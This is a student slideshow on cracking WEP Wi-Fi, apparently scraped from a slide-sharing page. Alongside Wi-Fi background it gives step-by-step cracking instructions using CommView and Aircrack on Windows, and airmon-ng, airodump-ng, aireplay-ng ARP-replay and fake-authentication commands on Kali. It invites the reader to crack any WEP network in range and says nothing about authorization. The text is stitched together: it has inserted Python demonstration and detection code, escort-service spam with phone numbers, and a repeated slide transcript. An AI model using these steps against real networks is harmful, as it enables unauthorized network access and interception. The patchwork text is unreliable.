* Contents
* INTRODUCTION
* HISTORY AND TYPES OF WiFi
* WHAT ARE WiFi NETWORKS?
* IMPORTANT TERMINOLOGY
* Wi-Fi SECURITY: METHODS OF WiFi
* WEP ENCRYPTION
* WEP CRACKING USING WINDOWS
* WEP CRACKING USING KALI
* RESEARCH PAPERS
* REFERENCES
Project Name: Wifi Cracking
Student Name: Mohammad Fareed
University: MMMUT Gorakhpur
E-mail ID: mohd.fareed1122@gmail.com
* INTRODUCTION
* Wi-Fi has emerged as the single most popular wireless network protocol of the 21st century. While other wireless protocols
work better in certain situations, Wi-Fi technology powers most home networks, many business local area networks and
public hotspot networks.
* Some people erroneously label all kinds of wireless networking as “Wi-Fi” when in reality Wi-Fi is just one of many wireless
technologies.
* Research Paper: The security of wifi connections has been in and out of the news over the past few years as the integrity
of the wifi encryption process has been progressively eroded. Wifi encryption is normally driven by the use of three
flavours of passwords/passphrases – Wired Equivalent Privacy (WEP), Wifi Protected Access (WPA) and WPA2 – which use
different methodologies to ensure (to differing degrees) the integrity of the wifi IP-based communications path. But all
have come under attack, with tools available to intercept and crack authentication. Does this mean that wifi should now
be considered insecure?
* HISTORY AND TYPES OF WiFi
* In the 1980s, a technology designed for wireless cash registers called WaveLAN was developed and shared with the
Institute of Electrical and Electronics Engineers (IEEE) group responsible for networking standards, known as committee
802. This technology was further developed during the 1990s until the committee published standard 802.11 in 1997.
* The initial form of Wi-Fi from that 1997 standard supported only 2 Mbps connections. This technology was not officially
known as “Wi-Fi” from the beginning either; that term was coined only a few years later as its popularity increased. An industry
standards group has continued to evolve the standard ever since, generating a family of new versions of Wi-Fi called
successively 802.11b, 802.11g, 802.11n, 802.11ac, and so on. Each of these related standards can communicate with
the others, although newer versions offer better performance and more features.
* Research Paper: Integrity in question
* In 2004, the integrity of the WEP password system was called into question after the Aircrack wifi password-cracking suite
was released. The open source suite – now known as Aircrack-ng and updated to perform attacks on the WPA/WPA2 wifi
password systems – consisted of a number of wireless auditing utilities:
* • Airodump – a 802.11 packet capture program.
* • Aireplay – a 802.11 packet injection program.
* • Aircrack – a static WEP and WPA-PSK key cracker.
* • Airdecap – which decrypts WEP/WPA capture files.
* Because the amount of time it takes to hack an encrypted wireless
network is dependent on the amount of traffic that the cracking software has access to, the second module of Aircrack –
Aireplay – is viewed as the most useful program of the four, as it allows the wireless hacker to increase the network traffic
and so speed up the hacking process. The third and fourth elements of the suite – Aircrack and Airdecap – were (and still
are) useful to crackers because they work for both WEP and WPA encryption, although back in 2004 the processing power
available at that time made the cracking of a WPA password a lengthy process – normally taking several weeks, even
where multi-core processing power was used. This contrasted with a typical cracking time for WEP (in 2004) of 20 minutes
or so – a time-frame that has been reduced to around 30 seconds using commercial software from Elcomsoft and others,
as well as open source/freeware apps/suites such as Aircrack.
* WHAT ARE WiFi NETWORKS?
Most of you will have used a wireless network in your college, office, hotel or an airport.
Wireless networks have become very common everywhere because of their great convenience and the growing
popularity of laptops. Typically, an area that offers wireless internet access is known as a hotspot.
Wi-Fi can be configured in one of two modes, called infrastructure mode Wi-Fi and ad-hoc mode Wi-Fi. Nearly all
Wi-Fi setups use infrastructure mode, where client devices within range all connect to and communicate through a
central wireless access point.
Ad hoc Wi-Fi allows clients to connect directly to each other without the use of an access point.
* IMPORTANT TERMINOLOGY
SSID:
short for service set identifier. It is the public name of a wireless network, which is used to identify a particular
network. SSIDs are case sensitive and are a sequence of alphanumeric characters (letters or numbers).
BSSID:
stands for basic service set identifier. It is the 48-bit MAC address of the access point of a wireless network.
WIRELESS ACCESS POINT:
a device that allows devices (like laptops and mobile devices) to connect to a wireless
network using WiFi and other wireless standards.
PSK: stands for pre-shared key and is commonly used in encryption systems. It is a password or secret key that is shared
among all the users using that particular encryption system.
RSSI: short for received signal strength indication. It represents the signal strength of a wireless network. RSSI
values range from 1 to 100.
* Wi-Fi SECURITY: METHODS OF WiFi
* Before cracking a Wi-Fi network, you must be aware of the basic encryption techniques that protect a Wi-Fi network.
These three methods of encryption are the major sources of vulnerability associated with wireless networks. The
different types of wireless encryption security techniques include the following:
* WEP: WEP is Wired Equivalent Privacy, which can be cracked easily even when configured appropriately. This method of
encryption can be cracked within a few minutes.
* WPA: WPA is Wi-Fi Protected Access, which provides strong security. Even then, it is possible to crack it if the Wi-Fi
password is short. However, wireless networks can be hacked easily using various tools.
* WPA2: WPA2 is Wi-Fi Protected Access 2, which also provides high security. This method of
Wi-Fi encryption can be hacked at the time of packet generation from Wi-Fi access points.
MAC ADDRESS: stands for media access control address. It is a 48-bit unique address that identifies every node
in a network. Usually MAC addresses are assigned at the time of manufacture itself.
For example, 00:02:2D:17:B9:E8 is a typical MAC address.
* WEP ENCRYPTION
WEP stands for Wired Equivalent Privacy. It is a security protocol that encrypts data transmitted over a wireless
network using a secret WEP key. There are typically 3 types of WEP key setting:
1) OFF.
2) 64-bit.
3) 128-bit.
 WEAKNESS IN WEP ENCRYPTION:
In the WEP protocol, the AP and all the clients (users) connected to a wireless network
must know the same security key or password.
If a user does not know the WEP shared key or password, the user is not allowed to
connect to the network. This gives an attacker plenty of time to find out the encryption key of the network.
Depending upon the network, the password of the user is usually 40 bits or 104 bits long. This is
concatenated with the 24-bit initialization vector (IV) to get a 64-bit or 128-bit WEP key, which is used for encrypting all data packets.
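The key construction described above, as an added Python example that is not part of the original slides: it builds the per-packet RC4 seed as IV || key, shows that two frames encrypted under the same IV leak the XOR of their plaintexts without the key being known, and estimates how quickly a 24-bit IV repeats. The key, IVs and payloads are constructed sample values.

```python
import math
import struct
import zlib

IV_BITS = 24  # size of the WEP initialization vector


def rc4_keystream(seed: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling followed by n bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Encrypt plaintext || CRC-32 ICV with RC4 seeded by IV || key."""
    if len(iv) != IV_BITS // 8 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 5- or 13-byte key")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    body = plaintext + icv
    return xor_bytes(body, rc4_keystream(iv + key, len(body)))


def iv_collision_probability(frames: int) -> float:
    """Birthday estimate that at least two of `frames` random IVs match."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** IV_BITS))


def demo() -> dict:
    key = bytes.fromhex("0102030405")        # constructed 40-bit key
    iv_a, iv_b = b"\x00\x00\x2a", b"\x00\x00\x2b"
    p1 = b"constructed frame payload one"    # constructed payloads
    p2 = b"constructed frame payload two"
    c1 = wep_encrypt(iv_a, key, p1)
    c2 = wep_encrypt(iv_a, key, p2)          # IV reused
    c3 = wep_encrypt(iv_b, key, p2)          # fresh IV
    expected = xor_bytes(p1, p2)
    return {
        "seed_bits": (len(iv_a) + len(key)) * 8,
        # Same IV means same keystream, so it cancels out of c1 XOR c2.
        "same_iv_leaks_xor": xor_bytes(c1, c2)[: len(p1)] == expected,
        "different_iv_leaks_xor": xor_bytes(c1, c3)[: len(p1)] == expected,
        "p_collision_5000_frames": iv_collision_probability(5000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Because the IV is sent in clear and is only 24 bits long, a busy network repeats IVs within a few thousand frames, which is why no WEP key length setting makes the protocol safe to keep in service.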
It took until December 2009 before leading security researcher Moxie Marlinspike – who has since gone on to develop a
number of smartphone and tablet computing crypto applications for the Android platform – launched the
WPAcracker.com website [1]. Using a parallel processing set of servers, Marlinspike claimed that his systems could crack
vulnerable WPA passwords in around 20 minutes, a process that would have taken a dual-core PC around 120 hours
using suitable software at the time. The cloud-based service – which costs $17.00 a time – reportedly uses a 400-node
cluster of computers to run through around 130 million WPA password combinations in 20 minutes. To use the service,
Internet users upload a copy of the handshake file that occurs when a wifi device starts negotiating a link with a wifi
access point – downloaded off-air using AirCrack’s Airodump module or an open source utility such as Wireshark.
Although Wireshark is generally best known as a packet sniffer and analyser, widely used for network troubleshooting,
analysis, software and communications protocol development – its considerable evolution, since it was first launched as
Ethereal, makes it a popular wifi analysis tool. The evolution of WPAcracker.com was notable in wireless cracking terms
as – according to Marlinspike – although rainbow tables can be used to brute-force crack a WPA password, the process
is truly brute force in nature because each cracking project is unique. As Marlinspike observes: “You have to build a
unique set of rainbow tables for each network that you would potentially like to audit.” A rainbow table is essentially a
precomputed table for reversing cryptographic hash functions, typically used for cracking password hashes.
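Why a precomputed table is tied to one network, as an added Python example that is not part of the quoted article: WPA/WPA2-PSK derives its 256-bit key with PBKDF2-HMAC-SHA1 using the SSID as the salt, so the same passphrase yields a different key on every SSID. The second function sizes a passphrase policy against the rate quoted above (130 million candidates per 20 minutes); the SSIDs, passphrases and the policy threshold are constructed assumptions.

```python
import hashlib

# Rate quoted in the passage above: 130 million candidates per 20 minutes.
QUOTED_GUESSES_PER_HOUR = 130_000_000 * 3


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """256-bit pre-shared key: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode(), ssid.encode(), 4096, 32
    )


def hours_to_exhaust(alphabet_size: int, length: int,
                     guesses_per_hour: float = QUOTED_GUESSES_PER_HOUR) -> float:
    """Hours needed to try every passphrase of the given shape."""
    return alphabet_size ** length / guesses_per_hour


def policy_report(min_hours: float = 24 * 365 * 100) -> list:
    """Rate a few passphrase shapes against a constructed 100-year bar."""
    shapes = [
        ("8 lowercase letters", 26, 8),
        ("10 lowercase letters and digits", 36, 10),
        ("12 mixed-case letters and digits", 62, 12),
        ("16 mixed-case letters and digits", 62, 16),
    ]
    report = []
    for label, alphabet, length in shapes:
        hours = hours_to_exhaust(alphabet, length)
        report.append((label, hours, hours >= min_hours))
    return report


def salt_demo() -> dict:
    # Constructed SSIDs: one common default-style name, one site-specific.
    a = wpa_psk("correct horse battery", "default")
    b = wpa_psk("correct horse battery", "plant-floor-7")
    return {"key_len": len(a), "same_key_across_ssids": a == b}


if __name__ == "__main__":
    print(salt_demo())
    for label, hours, ok in policy_report():
        print(f"{label:36s} {hours:14.3e} h  {'ok' if ok else 'too weak'}")
```

A table precomputed for one SSID is useless against another, so a site-specific SSID removes the shared-table shortcut and passphrase length does the rest.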
* WEP CRACKING USING WINDOWS
• You require the following tools to crack a WEP network using Windows:
• CommView for WiFi.
• Aircrack-ng GUI for Windows.
• A compatible WiFi card that supports monitor mode.
Step1: Start the CommView app. It will put your network adapter in monitor mode and allow you to record
data packets being transmitted across all the WiFi networks within range. Select any WEP network that you want to
crack; choose a network that has good signal strength.
Step2: Right-click on the WEP network and select the Copy MAC Address option.
Step3: Select the Rules tab in the menu at the top. Select MAC Addresses in the left column, enable MAC
address rules in the center, select Capture under Action and Both under Add Record, paste the copied MAC
address and press Add MAC Address.
Step4: Click on the Logging tab, enable auto-saving and increase the maximum directory size and average log file size
options.
Step5: Now wait until CommView records around 10,000 data packets. Monitor the number of data packets by clicking on
the Packets tab.
Step6: When you have around 10,000 data packets, go to the Logging tab and click the CONCATENATE LOGS
button, select all the capture files and save the combined log file anywhere on your computer.
Step7: Double-click on the log file. If you notice, 9247 data packets have been recorded in this log file.
Step8: Click on File > Export Logs > Wireshark/Tcpdump Format and save the log file in the selected format anywhere on your computer.
Step9: Unzip the downloaded file of the Aircrack-ng GUI and launch the Aircrack GUI application from the BIN folder.
Step10: Aircrack-ng will launch and will automatically try to crack the password. In this case, if you notice, it failed and tells me to try
recording more data packets/IVs.
Step11: Let's wait till I have recorded 21628 data packets/IVs.
Step12: Input the log files into Aircrack-ng and let's try again!
Step13: And now when I run Aircrack-ng again, it cracks the password and displays it on the screen! As simple as that.
WiFi Cracking using only cmd:
* WEP CRACKING USING KALI
You require the following to crack a WEP network using Kali:
 Kali Linux (VMware image or ISO).
 Aircrack-ng.
 A compatible WiFi network card.
The Aircrack-ng suite comes with the following set of tools:
1) Airmon-ng
2) Airodump-ng
3) Aireplay-ng
4) Aircrack-ng
WEP cracking using Kali is of two types:
1) PASSIVE technique
2) ACTIVE technique
PASSIVE WEP CRACKING TECHNIQUE
Passive WEP cracking is a technique where the attacker tries to crack the password by passively sniffing IVs of the target
network without sending/injecting any traffic to it.
Step1: PUT YOUR WiFi CARD INTO MONITOR MODE:
Put your WiFi card in monitor mode so that it can listen to all packets being transmitted and not just packets sent to your
system.
airmon-ng start wifi_interface_name
For example,
airmon-ng start wlan0
a) Check the status of the network interfaces:
ifconfig
b) Put the WiFi interface into monitor mode:
airmon-ng start wlan0
c) Ensure the WiFi interface is in monitor mode:
ifconfig
(NOTE: a secondary interface called mon0 is used when your WiFi interface is put into monitor mode.)
d) Let's see what WiFi networks we are able to catch:
airodump-ng wlan0
Step2: START DATA SNIFFER TO RECORD IVs:
Capture IVs of data packets being transmitted on only the target
WiFi network and ignore all other data packets:
airodump-ng -c channel --bssid APMAC -w outputfile interface
airodump-ng -c 1 --bssid 48:28:2F:DC:F5:D8 -w dump wlan0
Capture IVs of data packets being transmitted only on the target WEP network and ignore the rest.
Step3: CRACK THE WEP PASSWORD FROM THE CAPTURED IVs:
Once you have captured enough IVs (20,000-40,000) you can crack the WEP password using the
aircrack tool:
aircrack-ng -b AP_MAC *.cap
An alternative technique is to use the FMS/KoreK technique:
aircrack-ng -K -b AP_MAC *.cap
For example, in today's example I will type:
aircrack-ng -b 48:28:2F:DC:F5:D8 dump*.cap
Step4: LET'S SEE WHAT WiFi NETWORKS WE ARE ABLE TO CATCH:
airodump-ng wlan0
Important: Identify the BSSID (48:28:2F:DC:F5:D8) and channel (1) of the WiFi network you wish to crack and write them down
somewhere; you will need them in the next step.
* ACTIVE CRACKING WEP PASSWORD USING KALI
The problem with passive WEP cracking is that it can take a very long time, since you have to wait for an adequate number of IVs
to be captured, which can take 3-4 hours if there is not enough traffic or active clients on the target WiFi.
In active WEP cracking, the attacker actively injects data packets into the target WiFi network to generate
additional IVs and reduce the amount of time it takes to crack the password.
Step1: PUT YOUR WiFi CARD INTO MONITOR MODE:
Put the wireless interface in monitor mode on the AP channel so
that it can listen to all packets being transmitted and not just packets sent to your system.
For example, airmon-ng start wlan0
Step2: TEST WHETHER INJECTION IS POSSIBLE OR NOT:
Test whether your WiFi card and the target WiFi router are
within close enough range for your computer to be able to inject data packets into it. Not all WiFi cards support data
injection.
aireplay-ng -9 interfacename
For example, aireplay-ng -9 mon0
Step3: START DATA SNIFFER TO RECORD IVs:
Capture IVs of the data packets being transmitted on only the target WiFi network and ignore all other data packets.
airodump-ng -c channel --bssid APMAC -w output interface
airodump-ng -c 1 --bssid 48:28:2F:DC:F5:D8 -w dump mon0
Step4: ARP REQUEST REPLAY ATTACK:
In order to crack WEP keys it is important for an attacker to be able to record a large number of IVs from data packets
being sent across the target network.
An ARP request replay attack can easily be executed using the aireplay-ng tool:
aireplay-ng --arpreplay -b AP_MAC_FAKE_auth interfacename
For example, aireplay-ng --arpreplay -b 48:28:2F:DC:F5:D8 mon0
Step5: FAKE AUTHENTICATION ATTACK:
In the ARP request replay attack, the attacker sends an ARP packet to the router of the target WiFi network AP so that
it will generate more IVs.
The fake authentication attack allows an attacker to associate its MAC address with the AP, so that it
will not reject the ARP packets sent to it in the ARP request replay attack. This ensures that the target AP will generate new
IVs that can then be sniffed by the attacker to crack the WEP key.
aireplay-ng -1 0 -e ESSID -a AP_MAC interfacename
Step6: ARP REQUEST REPLAY ATTACK (ALTERNATE TECHNIQUE):
In case airodump-ng shows you some other device that is already associated with the target WiFi AP, you
can skip fake authentication and directly perform the ARP request replay attack using the MAC address of the associated
device.
For example, aireplay-ng --arpreplay -b 48:28:2F:DC:F5:D8 -h 1C:65:9D:C6:47:29 mon0
(where -h is used to specify the MAC address of the associated device).
Step7: CRACK THE WEP PASSWORD FROM THE CAPTURED IVs:
Once you have captured enough IVs, you can try to crack the WEP password using the aircrack tool:
aircrack-ng -b AP_MAC *.cap
An alternative technique is to use the FMS/KoreK technique:
aircrack-ng -K -b AP_MAC *.cap
Crack the WEP password from the captured IVs:
aircrack-ng -b 48:28:2F:DC:F5:D8 dump*.cap
After 15,000 IVs the WEP password has now been cracked.
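How the active technique above looks from the monitoring side, as an added Python example that is not part of the original slides: an ARP request replay makes one source address repeat a frame of identical length at a rate no normal client produces, so a sliding-window count per (source, BSSID, frame length) catches it. The one-line frame summary format, the threshold and the sample traffic are constructed assumptions; the BSSID and client MAC are the ones used in the commands above.

```python
from collections import defaultdict, deque

BSSID = "48:28:2f:dc:f5:d8"      # access point from the commands above
REPLAYER = "1c:65:9d:c6:47:29"   # associated-device MAC from the commands above
CLIENT = "02:00:00:00:00:01"     # constructed, locally administered MAC


def parse(line: str):
    """Constructed summary format: '<ts> <src> <bssid> <kind> <length>'."""
    ts, src, bssid, kind, length = line.split()
    return float(ts), src.lower(), bssid.lower(), kind, int(length)


def detect_arp_replay(lines, window: float = 1.0, threshold: int = 50) -> dict:
    """Flag sources sending >= threshold same-length ARP frames per window."""
    recent = defaultdict(deque)  # (src, bssid, length) -> recent timestamps
    alerts = {}
    for line in lines:
        ts, src, bssid, kind, length = parse(line)
        if kind != "arp":
            continue
        q = recent[(src, bssid, length)]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames outside the window
            q.popleft()
        if len(q) >= threshold and (src, bssid) not in alerts:
            alerts[(src, bssid)] = {
                "first_frame": q[0],
                "frames_in_window": len(q),
                "frame_length": length,
            }
    return alerts


def build_sample() -> list:
    """Constructed traffic: a quiet client plus one one-second replay burst."""
    lines = []
    for i in range(30):               # normal client: one ARP every 2 s
        lines.append(f"{i * 2.0:.3f} {CLIENT} {BSSID} arp 68")
        lines.append(f"{i * 2.0 + 0.5:.3f} {CLIENT} {BSSID} data 412")
    for i in range(200):              # replay burst: 200 identical frames/s
        lines.append(f"{10 + i * 0.005:.3f} {REPLAYER} {BSSID} arp 68")
    lines.sort(key=lambda entry: float(entry.split()[0]))
    return lines


if __name__ == "__main__":
    for (src, bssid), info in detect_arp_replay(build_sample()).items():
        print(f"possible ARP replay from {src} on {bssid}: {info}")
```

The same counter applied to authentication frames covers the fake authentication step, and on a network that still has to run WEP this alert is the signal to rotate the key and move the segment to WPA2 or later.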
* RESEARCH PAPERS
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park  6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park  6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
 
Roadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and RoutesRoadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and Routes
 
University management System project report..pdf
University management System project report..pdfUniversity management System project report..pdf
University management System project report..pdf
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
 
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular ConduitsUNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduits
 

Wifi cracking Step by Step Using CMD and Kali Linux 2018

  • 1. * Contents
    * Introduction
    * HISTORY AND TYPES OF WiFi
    * WHAT ARE WIFI NETWORKS
    * IMPORTANT TERMINOLOGY
    * Wi-Fi SECURITY: METHODS OF WiFi
    * WEP ENCRYPTION
    * WEP CRACKING USING WINDOWS
    * WEP CRACKING USING KALI
    * RESEARCH PAPERS
    * REFERENCES
    Project Name: Wifi Cracking
    Student Name: Mohammad Fareed
    University: MMMUT Gorakhpur
    E-mail ID: mohd.fareed1122@gmail.com
  • 2. * INTRODUCTION
    * Wi-Fi has emerged as the single most popular wireless network protocol of the 21st century. While other wireless protocols work better in certain situations, Wi-Fi technology powers most home networks, many business local area networks and public hotspot networks.
    * Some people erroneously label all kinds of wireless networking as “Wi-Fi” when in reality Wi-Fi is just one of many wireless technologies.
    * Research Paper: The security of wifi connections has been in and out of the news over the past few years as the integrity of the wifi encryption process has been progressively eroded. Wifi encryption is normally driven by the use of three flavours of passwords/passphrases – Wired Equivalent Privacy (WEP), Wifi Protected Access (WPA) and WPA2 – which use different methodologies to ensure (to differing degrees) the integrity of the wifi IP-based communications path. But all have come under attack, with tools available to intercept and crack authentication. Does this mean that wifi should now be considered insecure?
  • 3. * HISTORY AND TYPES OF WiFi
    * In the 1980s, a technology designed for wireless cash registers called WaveLAN was developed and shared with the Institute of Electrical and Electronics Engineers (IEEE) group responsible for networking standards, known as committee 802. This technology was further developed during the 1990s until the committee published standard 802.11 in 1997.
    * The initial form of Wi-Fi from that 1997 standard supported only 2 Mbps connections. This technology was not officially known as “Wi-Fi” from the beginning either; that term was coined only a few years later as its popularity increased. An industry standards group has continued to evolve the standard ever since, generating a family of new versions of Wi-Fi called successively 802.11b, 802.11g, 802.11n, 802.11ac, and so on. Each of these related standards can communicate with each other, although newer versions offer better performance and more features.
    * Research Paper: Integrity in question
    In 2004, the integrity of the WEP password system was called into question after the Aircrack wifi password-cracking suite was released. The open source suite – now known as Aircrack-ng and updated to perform attacks on the WPA/WPA2 wifi password systems – consisted of a number of wireless auditing utilities:
    • Airodump – an 802.11 packet capture program.
    • Aireplay – an 802.11 packet injection program.
    • Aircrack – a static WEP and WPA-PSK key cracker.
    • Airdecap – which decrypts WEP/WPA capture files.
    Because the amount of time it takes to hack an encrypted wireless network is dependent on the amount of traffic that the cracking software has access to, the second module of Aircrack – Aireplay – is viewed as the most useful program of the four, as it allows the wireless hacker to increase the network traffic and so speed up the hacking process.
    The third and fourth elements of the suite – Aircrack and Airdecap – were (and still are) useful to crackers because they work for both WEP and WPA encryption, although back in 2004 the processing power available at that time made the cracking of a WPA password a lengthy process – normally taking several weeks, even where multi-core processing power was used. This contrasted with a typical cracking time for WEP (in 2004) of 20 minutes or so – a time-frame that has been reduced to around 30 seconds using commercial software from Elcomsoft and others, as well as open source/freeware apps/suites such as Aircrack.
  • 4. * WHAT ARE WIFI NETWORKS?
    Most of you will have used a wireless network in your college, office, hotel or at an airport. Wireless networks have become very common everywhere due to their great convenience and the growing popularity of laptops. Typically an area that offers wireless internet access is known as a hotspot.
    Wi-Fi can be configured in one of two modes, called infrastructure mode Wi-Fi and ad-hoc mode Wi-Fi. Nearly all Wi-Fi setups use infrastructure mode, where client devices within range all connect to and communicate through a central wireless access point. Ad hoc Wi-Fi allows clients to connect directly to each other without the use of an access point.
    * IMPORTANT TERMINOLOGY
    SSID: short for service set identifier. It is the public name of a wireless network, which is used to identify a particular network. SSIDs are case sensitive and are a sequence of alphanumeric characters (letters or numbers).
    BSSID: stands for basic service set identifier; it is the 48-bit MAC address of the access point of a wireless network.
    WIRELESS ACCESS POINT: a device that allows devices (like laptops and mobile devices) to connect to a wireless network using wifi and other wireless standards.
  • 5. PSK: stands for pre-shared key and is commonly used in encryption systems. It is a password or secret key that is shared among all the users using that particular encryption system.
    RSSI: short for received signal strength indication; it represents the signal strength of a wireless network. RSSI values range from 1 to 100.
    * Wi-Fi SECURITY: METHODS OF WiFi
    * Before cracking a Wi-Fi network, you must be aware of the basic encryption techniques that protect a Wi-Fi network. These three methods of encryption are the major sources of vulnerability associated with wireless networks. The different types of wireless encryption security techniques include the following:
    * WEP: WEP is Wired Equivalent Privacy, which can be cracked easily when configured appropriately. This method of encryption can be cracked within a few minutes.
    * WPA: WPA is Wi-Fi Protected Access, which provides strong security. Even then, it is possible to crack it if the Wi-Fi password is short. However, wireless networks can be hacked easily using various tools.
    * WPA2: WPA2 is Wi-Fi Protected Access 2, which also provides high security. You can hack this method of Wi-Fi encryption at the time of packet generation from Wi-Fi access points.
    MAC ADDRESS: stands for media access control address; it is a 48-bit unique address that identifies every node in a network. Usually MAC addresses are assigned at the time of manufacture itself. For example, 00:02:2D:17:B9:E8 is a typical MAC address.
  • 6. * WEP ENCRYPTION
    WEP stands for Wired Equivalent Privacy; it is a security protocol that encrypts data transmitted over a wireless network using a secret WEP key. There are typically 3 types of WEP key: 1) Off. 2) 64-bit. 3) 128-bit.
    * WEAKNESS IN WEP ENCRYPTION: In the WEP protocol, the AP and all the clients (users) connected to a wireless network must know the same security key or password. If the user does not know the WEP shared key or password, then the user may not be allowed to connect to the network. This gives an attacker plenty of time to find out the encryption key of the network. Depending upon the network, the password of the user is usually 40 bits or 104 bits. This is concatenated with the 24-bit initialization vector (IV) to get a 64-bit or 128-bit WEP key, which is used for encrypting all data packets.
    It took until December 2009 before leading security researcher Moxie Marlinspike – who has since gone on to develop a number of smartphone and tablet computing crypto applications for the Android platform – launched the WPAcracker.com website.[1] Using a parallel processing set of servers, Marlinspike claimed that his systems could crack vulnerable WPA passwords in around 20 minutes, a process that would have taken a dual-core PC around 120 hours using suitable software at the time. The cloud-based service – which costs $17.00 a time – reportedly uses a 400-node cluster of computers to run through around 130 million WPA password combinations in 20 minutes. To use the service, Internet users upload a copy of the handshake file that occurs when a wifi device starts negotiating a link with a wifi access point – downloaded off-air using AirCrack’s Airodump module or an open source utility such as Wireshark.
    Although Wireshark is generally best known as a packet sniffer and analyser, widely used for network troubleshooting, analysis, software and communications protocol development – its considerable evolution, since it was first launched as Ethereal, makes it a popular wifi analysis tool. The evolution of WPAcracker.com was notable in wireless cracking terms as – according to Marlinspike – although rainbow tables can be used to brute-force crack a WPA password, the process is truly brute force in nature because each cracking project is unique. As Marlinspike observes: “You have to build a unique set of rainbow tables for each network that you would potentially like to audit.” A rainbow table is essentially a precomputed table for reversing cryptographic hash functions, typically used for cracking password hashes.
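The key construction described in the WEP weakness slide above (a 24-bit IV concatenated with the shared secret), as an added example that is not part of the original slides: it shows why so small an IV space makes the design unsound, since a repeated IV repeats the RC4 keystream and the keystream then cancels out of two ciphertexts. The frame layout is simplified (no 802.11 header or key-ID byte), and the function names, secret, IV and plaintexts are constructed for illustration.

```python
import math
import zlib

IV_SPACE = 2 ** 24  # WEP's IV is 24 bits, sent in clear with every frame

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def rc4(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream for key."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):                        # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def per_packet_key(iv: bytes, secret: bytes) -> bytes:
    """IV || secret: 3+5 bytes = 64-bit WEP, 3+13 bytes = 128-bit WEP."""
    if len(iv) != 3 or len(secret) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 5- or 13-byte secret")
    return iv + secret

def wep_encrypt(iv: bytes, secret: bytes, plaintext: bytes) -> bytes:
    """Simplified frame: IV in clear, then RC4-encrypted data || CRC-32 ICV."""
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + xor_bytes(body, rc4(per_packet_key(iv, secret), len(body)))

def wep_decrypt(frame: bytes, secret: bytes) -> bytes:
    """Decrypt a simplified frame and verify its integrity check value."""
    iv, ct = frame[:3], frame[3:]
    body = xor_bytes(ct, rc4(per_packet_key(iv, secret), len(ct)))
    data, icv = body[:-4], body[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return data

def iv_collision_probability(frames: int) -> float:
    """Birthday bound: chance that at least two of `frames` random IVs match."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2 * IV_SPACE))

def frames_for_collision(p: float = 0.5) -> int:
    """Frames needed before a repeated IV is expected with probability p."""
    return math.ceil(math.sqrt(2 * IV_SPACE * math.log(1 / (1 - p))))

def demo():
    secret = bytes.fromhex("0102030405")      # constructed 40-bit secret
    iv = bytes.fromhex("a1b2c3")              # constructed IV, reused on purpose
    p1 = b"GET /index.html "                  # constructed plaintexts
    p2 = b"POST /login.php "
    c1, c2 = wep_encrypt(iv, secret, p1), wep_encrypt(iv, secret, p2)
    # Same IV -> same keystream, so it cancels out of c1 XOR c2.
    leaked = xor_bytes(c1[3:3 + len(p1)], c2[3:3 + len(p2)])
    return leaked == xor_bytes(p1, p2), frames_for_collision(0.5)

if __name__ == "__main__":
    print(demo())
```

With randomly chosen IVs, a repeat is more likely than not after only a few thousand frames, which is one reason WEP networks should be migrated to WPA2 or later rather than hardened.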
  • 7. * WEP CRACKING USING WINDOWS
    You require the following tools to crack a WEP network using Windows:
